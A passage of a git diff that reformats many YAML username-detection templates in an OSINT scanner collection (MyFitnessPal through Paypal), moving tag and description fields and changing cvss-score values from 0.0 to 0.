CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mybuildercom metadata: max-request: 1 + tags: osint,osint-social,mybuildercom self-contained: true + http: - method: GET path: diff --git a/http/osint/myfitnesspal-author.yaml b/http/osint/myfitnesspal-author.yaml index 49598626fa..6017d88e6c 100644 --- a/http/osint/myfitnesspal-author.yaml +++ b/http/osint/myfitnesspal-author.yaml @@ -3,17 +3,18 @@ id: myfitnesspal-author info: name: MyFitnessPal Author User Name Information - Detect author: dwisiswant0 - description: MyFitnessPal Author user name information check was conducted. severity: info + description: MyFitnessPal Author user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-health,myfitnesspal-author metadata: max-request: 1 + tags: osint,osint-health,myfitnesspal-author self-contained: true + http: - method: GET path: diff --git a/http/osint/myfitnesspal-community.yaml b/http/osint/myfitnesspal-community.yaml index 4e5ae846f1..a7db2f79c3 100644 --- a/http/osint/myfitnesspal-community.yaml +++ b/http/osint/myfitnesspal-community.yaml @@ -3,17 +3,18 @@ id: myfitnesspal-community info: name: MyFitnessPal Community User Name Information - Detect author: dwisiswant0 - description: MyFitnessPal Community user name information check was conducted. severity: info + description: MyFitnessPal Community user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-health,myfitnesspal-community metadata: max-request: 1 + tags: osint,osint-health,myfitnesspal-community self-contained: true + http: - method: GET path: diff --git a/http/osint/mylot.yaml b/http/osint/mylot.yaml index fd4e0585b8..599f6adbe0 100644 --- a/http/osint/mylot.yaml +++ b/http/osint/mylot.yaml @@ -3,17 +3,18 @@ id: mylot info: name: MyLot User Name Information - Detect author: dwisiswant0 - description: MyLot user name information check was conducted. severity: info + description: MyLot user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mylot metadata: max-request: 1 + tags: osint,osint-social,mylot self-contained: true + http: - method: GET path: diff --git a/http/osint/mymfans.yaml b/http/osint/mymfans.yaml index 9fed3f7d4e..71f36e8dee 100644 --- a/http/osint/mymfans.yaml +++ b/http/osint/mymfans.yaml @@ -3,17 +3,18 @@ id: mymfans info: name: Mym.fans User Name Information - Detect author: dwisiswant0 - description: Mym.fans user name information check was conducted. severity: info + description: Mym.fans user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,mymfans metadata: max-request: 1 + tags: osint,osint-social,mymfans self-contained: true + http: - method: GET path: diff --git a/http/osint/myportfolio.yaml b/http/osint/myportfolio.yaml index 7c32b4e810..1dea633552 100644 --- a/http/osint/myportfolio.yaml +++ b/http/osint/myportfolio.yaml @@ -3,17 +3,18 @@ id: myportfolio info: name: Myportfolio User Name Information - Detect author: dwisiswant0 - description: Myportfolio user name information check was conducted. severity: info + description: Myportfolio user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,myportfolio metadata: max-request: 1 + tags: osint,osint-misc,myportfolio self-contained: true + http: - method: GET path: diff --git a/http/osint/myspace.yaml b/http/osint/myspace.yaml index 44e237dcb4..aa4964abfd 100644 --- a/http/osint/myspace.yaml +++ b/http/osint/myspace.yaml @@ -3,17 +3,18 @@ id: myspace info: name: MySpace User Name Information - Detect author: dwisiswant0 - description: MySpace user name information check was conducted. severity: info + description: MySpace user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,myspace metadata: max-request: 1 + tags: osint,osint-social,myspace self-contained: true + http: - method: GET path: diff --git a/http/osint/myspreadshop.yaml b/http/osint/myspreadshop.yaml index 78a1088b08..face76bc36 100644 --- a/http/osint/myspreadshop.yaml +++ b/http/osint/myspreadshop.yaml @@ -3,17 +3,18 @@ id: myspreadshop info: name: Myspreadshop User Name Information - Detect author: dwisiswant0 - description: Myspreadshop user name information check was conducted. severity: info + description: Myspreadshop user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,myspreadshop metadata: max-request: 1 + tags: osint,osint-business,myspreadshop self-contained: true + http: - method: GET path: diff --git a/http/osint/naija-planet.yaml b/http/osint/naija-planet.yaml index 22297e8f8a..ff843a87d3 100644 --- a/http/osint/naija-planet.yaml +++ b/http/osint/naija-planet.yaml @@ -3,17 +3,18 @@ id: naija-planet info: name: Naija planet User Name Information - Detect author: dwisiswant0 - description: Naija planet user name information check was conducted. severity: info + description: Naija planet user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-dating,naija-planet metadata: max-request: 1 + tags: osint,osint-dating,naija-planet self-contained: true + http: - method: GET path: diff --git a/http/osint/nairaland.yaml b/http/osint/nairaland.yaml index 23b53edab9..4609b549aa 100644 --- a/http/osint/nairaland.yaml +++ b/http/osint/nairaland.yaml @@ -3,17 +3,18 @@ id: nairaland info: name: Nairaland User Name Information - Detect author: dwisiswant0 - description: Nairaland user name information check was conducted. severity: info + description: Nairaland user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-news,nairaland metadata: max-request: 1 + tags: osint,osint-news,nairaland self-contained: true + http: - method: GET path: diff --git a/http/osint/naturalnews.yaml b/http/osint/naturalnews.yaml index ca4ef187f8..7d7863d6ed 100644 --- a/http/osint/naturalnews.yaml +++ b/http/osint/naturalnews.yaml @@ -3,17 +3,18 @@ id: naturalnews info: name: NaturalNews User Name Information - Detect author: dwisiswant0 - description: NaturalNews user name information check was conducted. severity: info + description: NaturalNews user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-political,naturalnews metadata: max-request: 1 + tags: osint,osint-political,naturalnews self-contained: true + http: - method: GET path: diff --git a/http/osint/naver.yaml b/http/osint/naver.yaml index 185b036aa1..dbe461c4ee 100644 --- a/http/osint/naver.yaml +++ b/http/osint/naver.yaml @@ -3,17 +3,18 @@ id: naver info: name: Naver User Name Information - Detect author: dwisiswant0 - description: Naver user name information check was conducted. severity: info + description: Naver user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,naver metadata: max-request: 1 + tags: osint,osint-social,naver self-contained: true + http: - method: GET path: diff --git a/http/osint/netvibes.yaml b/http/osint/netvibes.yaml index 9dec3a7dfc..406c3c09e0 100644 --- a/http/osint/netvibes.yaml +++ b/http/osint/netvibes.yaml @@ -3,17 +3,18 @@ id: netvibes info: name: Netvibes User Name Information - Detect author: dwisiswant0 - description: Netvibes user name information check was conducted. severity: info + description: Netvibes user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,netvibes metadata: max-request: 1 + tags: osint,osint-social,netvibes self-contained: true + http: - method: GET path: diff --git a/http/osint/newgrounds.yaml b/http/osint/newgrounds.yaml index f0f499612a..1990cbcfc8 100644 --- a/http/osint/newgrounds.yaml +++ b/http/osint/newgrounds.yaml @@ -3,17 +3,18 @@ id: newgrounds info: name: Newgrounds User Name Information - Detect author: dwisiswant0 - description: Newgrounds user name information check was conducted. severity: info + description: Newgrounds user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,newgrounds metadata: max-request: 1 + tags: osint,osint-gaming,newgrounds self-contained: true + http: - method: GET path: diff --git a/http/osint/newmeet.yaml b/http/osint/newmeet.yaml index a8d6c3cf93..f2eadef4b1 100644 --- a/http/osint/newmeet.yaml +++ b/http/osint/newmeet.yaml @@ -3,17 +3,18 @@ id: newmeet info: name: Newmeet User Name Information - Detect author: dwisiswant0 - description: Newmeet user name information check was conducted. severity: info + description: Newmeet user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-dating,newmeet metadata: max-request: 1 + tags: osint,osint-dating,newmeet self-contained: true + http: - method: GET path: diff --git a/http/osint/nihbuatjajan.yaml b/http/osint/nihbuatjajan.yaml index e12d9eb55f..9c3b2a7cd3 100644 --- a/http/osint/nihbuatjajan.yaml +++ b/http/osint/nihbuatjajan.yaml @@ -3,17 +3,18 @@ id: nihbuatjajan info: name: Nihbuatjajan User Name Information - Detect author: dwisiswant0 - description: Nihbuatjajan user name information check was conducted. severity: info + description: Nihbuatjajan user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,nihbuatjajan metadata: max-request: 1 + tags: osint,osint-social,nihbuatjajan self-contained: true + http: - method: GET path: diff --git a/http/osint/nitecrew-mastodon-instance.yaml b/http/osint/nitecrew-mastodon-instance.yaml index c5c72fbb1b..3eb479b4fb 100644 --- a/http/osint/nitecrew-mastodon-instance.yaml +++ b/http/osint/nitecrew-mastodon-instance.yaml @@ -3,17 +3,18 @@ id: nitecrew-mastodon-instance info: name: Nitecrew (Mastodon Instance) User Name Information - Detect author: dwisiswant0 - description: Nitecrew (Mastodon Instance) user name information check was conducted. severity: info + description: Nitecrew (Mastodon Instance) user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,nitecrew-mastodon-instance metadata: max-request: 1 + tags: osint,osint-social,nitecrew-mastodon-instance self-contained: true + http: - method: GET path: diff --git a/http/osint/nnru.yaml b/http/osint/nnru.yaml index 0b82401f46..f16c2efe73 100644 --- a/http/osint/nnru.yaml +++ b/http/osint/nnru.yaml @@ -3,17 +3,18 @@ id: nnru info: name: Nnru User Name Information - Detect author: dwisiswant0 - description: Nnru user name information check was conducted. severity: info + description: Nnru user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,nnru metadata: max-request: 1 + tags: osint,osint-social,nnru self-contained: true + http: - method: GET path: diff --git a/http/osint/notabug.yaml b/http/osint/notabug.yaml index cf357afed8..57ef41c8f7 100644 --- a/http/osint/notabug.yaml +++ b/http/osint/notabug.yaml @@ -3,17 +3,18 @@ id: notabug info: name: NotABug User Name Information - Detect author: dwisiswant0 - description: NotABug user name information check was conducted. severity: info + description: NotABug user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,notabug metadata: max-request: 1 + tags: osint,osint-coding,notabug self-contained: true + http: - method: GET path: diff --git a/http/osint/note.yaml b/http/osint/note.yaml index e3cb71a02f..820b3864d4 100644 --- a/http/osint/note.yaml +++ b/http/osint/note.yaml @@ -3,17 +3,18 @@ id: note info: name: Note User Name Information - Detect author: dwisiswant0 - description: Note user name information check was conducted. severity: info + description: Note user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,note metadata: max-request: 1 + tags: osint,osint-social,note self-contained: true + http: - method: GET path: diff --git a/http/osint/npmjs.yaml b/http/osint/npmjs.yaml index 9ed79153c1..268b4eb08b 100644 --- a/http/osint/npmjs.yaml +++ b/http/osint/npmjs.yaml @@ -7,13 +7,14 @@ info: description: NPMjs user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,npmjs metadata: max-request: 1 + tags: osint,osint-social,npmjs self-contained: true + http: - method: GET path: diff --git a/http/osint/oglaszamy24hpl.yaml b/http/osint/oglaszamy24hpl.yaml index 4922955b12..dfe5f42f26 100644 --- a/http/osint/oglaszamy24hpl.yaml +++ b/http/osint/oglaszamy24hpl.yaml @@ -3,17 +3,18 @@ id: oglaszamy24hpl info: name: Oglaszamy24h.pl User Name Information - Detect author: dwisiswant0 - description: Oglaszamy24h.pl user name information check was conducted. severity: info + description: Oglaszamy24h.pl user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,oglaszamy24hpl metadata: max-request: 1 + tags: osint,osint-shopping,oglaszamy24hpl self-contained: true + http: - method: GET path: diff --git a/http/osint/ogugg.yaml b/http/osint/ogugg.yaml index 303cc95ad0..000bcbceee 100644 --- a/http/osint/ogugg.yaml +++ b/http/osint/ogugg.yaml @@ -3,17 +3,18 @@ id: ogugg info: name: Ogu.gg User Name Information - Detect author: dwisiswant0 - description: Ogu.gg user name information check was conducted. severity: info + description: Ogu.gg user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,ogugg metadata: max-request: 1 + tags: osint,osint-social,ogugg self-contained: true + http: - method: GET path: diff --git a/http/osint/okidoki.yaml b/http/osint/okidoki.yaml index e80dd16b13..43f114e1ff 100644 --- a/http/osint/okidoki.yaml +++ b/http/osint/okidoki.yaml @@ -3,17 +3,18 @@ id: okidoki info: name: Okidoki User Name Information - Detect author: dwisiswant0 - description: Okidoki user name information check was conducted. severity: info + description: Okidoki user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,okidoki metadata: max-request: 1 + tags: osint,osint-misc,okidoki self-contained: true + http: - method: GET path: diff --git a/http/osint/okru.yaml b/http/osint/okru.yaml index 61c14ab529..04a11c1bad 100644 --- a/http/osint/okru.yaml +++ b/http/osint/okru.yaml @@ -3,17 +3,18 @@ id: okru info: name: Ok.ru User Name Information - Detect author: dwisiswant0 - description: Ok.ru user name information check was conducted. severity: info + description: Ok.ru user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,okru metadata: max-request: 1 + tags: osint,osint-social,okru self-contained: true + http: - method: GET path: diff --git a/http/osint/olx.yaml b/http/osint/olx.yaml index 60b5632b13..ffea803ebf 100644 --- a/http/osint/olx.yaml +++ b/http/osint/olx.yaml @@ -3,17 +3,18 @@ id: olx info: name: Olx User Name Information - Detect author: dwisiswant0 - description: Olx user name information check was conducted. severity: info + description: Olx user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-shopping,olx metadata: max-request: 1 + tags: osint,osint-shopping,olx self-contained: true + http: - method: GET path: diff --git a/http/osint/omlet.yaml b/http/osint/omlet.yaml index 2ec4f2b3b5..08f4ae7088 100644 --- a/http/osint/omlet.yaml +++ b/http/osint/omlet.yaml @@ -3,17 +3,18 @@ id: omlet info: name: Omlet User Name Information - Detect author: dwisiswant0 - description: Omlet user name information check was conducted. severity: info + description: Omlet user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,omlet metadata: max-request: 1 + tags: osint,osint-gaming,omlet self-contained: true + http: - method: GET path: diff --git a/http/osint/opencollective.yaml b/http/osint/opencollective.yaml index 794442b790..47eccfa3fe 100644 --- a/http/osint/opencollective.yaml +++ b/http/osint/opencollective.yaml @@ -3,17 +3,18 @@ id: opencollective info: name: Opencollective User Name Information - Detect author: dwisiswant0 - description: Opencollective user name information check was conducted. severity: info + description: Opencollective user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,opencollective metadata: max-request: 1 + tags: osint,osint-finance,opencollective self-contained: true + http: - method: GET path: diff --git a/http/osint/opensource.yaml b/http/osint/opensource.yaml index 17dbae3b0a..294b1f0848 100644 --- a/http/osint/opensource.yaml +++ b/http/osint/opensource.yaml @@ -3,17 +3,18 @@ id: opensource info: name: Opensource User Name Information - Detect author: dwisiswant0 - description: Opensource user name information check was conducted. severity: info + description: Opensource user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,opensource metadata: max-request: 1 + tags: osint,osint-tech,opensource self-contained: true + http: - method: GET path: diff --git a/http/osint/openstreetmap.yaml b/http/osint/openstreetmap.yaml index 5333dc3bb6..dd2b29c317 100644 --- a/http/osint/openstreetmap.yaml +++ b/http/osint/openstreetmap.yaml @@ -3,17 +3,18 @@ id: openstreetmap info: name: OpenStreetMap User Name Information - Detect author: dwisiswant0 - description: OpenStreetMap user name information check was conducted. severity: info + description: OpenStreetMap user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,openstreetmap metadata: max-request: 1 + tags: osint,osint-social,openstreetmap self-contained: true + http: - method: GET path: diff --git a/http/osint/opgg.yaml b/http/osint/opgg.yaml index 4454b5306c..8e452f9230 100644 --- a/http/osint/opgg.yaml +++ b/http/osint/opgg.yaml @@ -3,17 +3,18 @@ id: opgg info: name: OPGG User Name Information - Detect author: dwisiswant0 - description: OPGG user name information check was conducted. severity: info + description: OPGG user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,opgg metadata: max-request: 1 + tags: osint,osint-gaming,opgg self-contained: true + http: - method: GET path: diff --git a/http/osint/orbys.yaml b/http/osint/orbys.yaml index 37aa5fe5b8..92e106bbc4 100644 --- a/http/osint/orbys.yaml +++ b/http/osint/orbys.yaml @@ -3,17 +3,18 @@ id: orbys info: name: Orbys User Name Information - Detect author: dwisiswant0 - description: Orbys user name information check was conducted. severity: info + description: Orbys user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,orbys metadata: max-request: 1 + tags: osint,osint-social,orbys self-contained: true + http: - method: GET path: diff --git a/http/osint/osu.yaml b/http/osint/osu.yaml index f15e1a9fc8..90e99edc17 100644 --- a/http/osint/osu.yaml +++ b/http/osint/osu.yaml @@ -3,17 +3,18 @@ id: osu info: name: Osu! User Name Information - Detect author: dwisiswant0 - description: Osu! user name information check was conducted. severity: info + description: Osu! user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,osu metadata: max-request: 1 + tags: osint,osint-gaming,osu self-contained: true + http: - method: GET path: diff --git a/http/osint/our-freedom-book.yaml b/http/osint/our-freedom-book.yaml index fa4d8eb55c..3d896ba44e 100644 --- a/http/osint/our-freedom-book.yaml +++ b/http/osint/our-freedom-book.yaml @@ -3,17 +3,18 @@ id: our-freedom-book info: name: Our Freedom Book User Name Information - Detect author: dwisiswant0 - description: Our Freedom Book user name information check was conducted. severity: info + description: Our Freedom Book user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,our-freedom-book metadata: max-request: 1 + tags: osint,osint-social,our-freedom-book self-contained: true + http: - method: GET path: diff --git a/http/osint/owly.yaml b/http/osint/owly.yaml index cb396a48bc..fc13e4c2b0 100644 --- a/http/osint/owly.yaml +++ b/http/osint/owly.yaml @@ -3,17 +3,18 @@ id: owly info: name: Ow.ly User Name Information - Detect author: dwisiswant0 - description: Ow.ly user name information check was conducted. severity: info + description: Ow.ly user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,owly metadata: max-request: 1 + tags: osint,osint-social,owly self-contained: true + http: - method: GET path: diff --git a/http/osint/palnet.yaml b/http/osint/palnet.yaml index 75399c884d..c90f676e5a 100644 --- a/http/osint/palnet.yaml +++ b/http/osint/palnet.yaml @@ -3,17 +3,18 @@ id: palnet info: name: Palnet User Name Information - Detect author: dwisiswant0 - description: Palnet user name information check was conducted. severity: info + description: Palnet user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,palnet metadata: max-request: 1 + tags: osint,osint-finance,palnet self-contained: true + http: - method: GET path: diff --git a/http/osint/parler-archived-posts.yaml b/http/osint/parler-archived-posts.yaml index 96e58d24e2..ab9e53e769 100644 --- a/http/osint/parler-archived-posts.yaml +++ b/http/osint/parler-archived-posts.yaml @@ -3,17 +3,18 @@ id: parler-archived-posts info: name: Parler archived posts User Name Information - Detect author: dwisiswant0 - description: Parler archived posts user name information check was conducted. severity: info + description: Parler archived posts user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-archived,parler-archived-posts metadata: max-request: 1 + tags: osint,osint-archived,parler-archived-posts self-contained: true + http: - method: GET path: diff --git a/http/osint/parler-archived-profile.yaml b/http/osint/parler-archived-profile.yaml index 07ee4b6a2d..153ef47c17 100644 --- a/http/osint/parler-archived-profile.yaml +++ b/http/osint/parler-archived-profile.yaml @@ -3,17 +3,18 @@ id: parler-archived-profile info: name: Parler archived profile User Name Information - Detect author: dwisiswant0 - description: Parler archived profile user name information check was conducted. severity: info + description: Parler archived profile user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-archived,parler-archived-profile metadata: max-request: 1 + tags: osint,osint-archived,parler-archived-profile self-contained: true + http: - method: GET path: diff --git a/http/osint/parler.yaml b/http/osint/parler.yaml index b4ce5bf80f..140cc493ba 100644 --- a/http/osint/parler.yaml +++ b/http/osint/parler.yaml @@ -3,17 +3,18 @@ id: parler info: name: Parler User Name Information - Detect author: dwisiswant0 - description: Parler user name information check was conducted. severity: info + description: Parler user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,parler metadata: max-request: 1 + tags: osint,osint-social,parler self-contained: true + http: - method: GET path: diff --git a/http/osint/pastebin.yaml b/http/osint/pastebin.yaml index 6f80fa35a5..68cf695f77 100644 --- a/http/osint/pastebin.yaml +++ b/http/osint/pastebin.yaml @@ -3,17 +3,18 @@ id: pastebin info: name: Pastebin User Name Information - Detect author: dwisiswant0 - description: Pastebin user name information check was conducted. severity: info + description: Pastebin user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,pastebin metadata: max-request: 1 + tags: osint,osint-tech,pastebin self-contained: true + http: - method: GET path: diff --git a/http/osint/patch.yaml b/http/osint/patch.yaml index f784121b5c..a833a0c7bc 100644 --- a/http/osint/patch.yaml +++ b/http/osint/patch.yaml @@ -3,17 +3,18 @@ id: patch info: name: Patch User Name Information - Detect author: dwisiswant0 - description: Patch user name information check was conducted. severity: info + description: Patch user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-news,patch metadata: max-request: 1 + tags: osint,osint-news,patch self-contained: true + http: - method: GET path: diff --git a/http/osint/patientslikeme.yaml b/http/osint/patientslikeme.yaml index 8a5c4e6b2e..4a4a3e57ba 100644 --- a/http/osint/patientslikeme.yaml +++ b/http/osint/patientslikeme.yaml @@ -3,17 +3,18 @@ id: patientslikeme info: name: PatientsLikeMe User Name Information - Detect author: dwisiswant0 - description: PatientsLikeMe user name information check was conducted. severity: info + description: PatientsLikeMe user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-health,patientslikeme metadata: max-request: 1 + tags: osint,osint-health,patientslikeme self-contained: true + http: - method: GET path: diff --git a/http/osint/patreon.yaml b/http/osint/patreon.yaml index eea3710267..ff31c31531 100644 --- a/http/osint/patreon.yaml +++ b/http/osint/patreon.yaml @@ -3,17 +3,18 @@ id: patreon info: name: Patreon User Name Information - Detect author: dwisiswant0 - description: Patreon user name information check was conducted. severity: info + description: Patreon user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,patreon metadata: max-request: 1 + tags: osint,osint-finance,patreon self-contained: true + http: - method: GET path: diff --git a/http/osint/patriots-win.yaml b/http/osint/patriots-win.yaml index 734f377c26..4cfab33cd2 100644 --- a/http/osint/patriots-win.yaml +++ b/http/osint/patriots-win.yaml @@ -3,17 +3,18 @@ id: patriots-win info: name: Patriots Win User Name Information - Detect author: dwisiswant0 - description: Patriots Win user name information check was conducted. severity: info + description: Patriots Win user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-political,patriots-win metadata: max-request: 1 + tags: osint,osint-political,patriots-win self-contained: true + http: - method: GET path: diff --git a/http/osint/patronite.yaml b/http/osint/patronite.yaml index d0203faf4c..ec781cc519 100644 --- a/http/osint/patronite.yaml +++ b/http/osint/patronite.yaml @@ -3,17 +3,18 @@ id: patronite info: name: Patronite User Name Information - Detect author: dwisiswant0 - description: Patronite user name information check was conducted. severity: info + description: Patronite user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,patronite metadata: max-request: 1 + tags: osint,osint-finance,patronite self-contained: true + http: - method: GET path: diff --git a/http/osint/paypal.yaml b/http/osint/paypal.yaml index 27e3f4e48e..bb1b7a86f7 100644 --- a/http/osint/paypal.yaml +++ b/http/osint/paypal.yaml @@ -3,17 +3,18 @@ id: paypal info: name: Paypal User Name Information - Detect author: dwisiswant0 - description: Paypal user name information check was conducted. severity: info + description: Paypal user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: 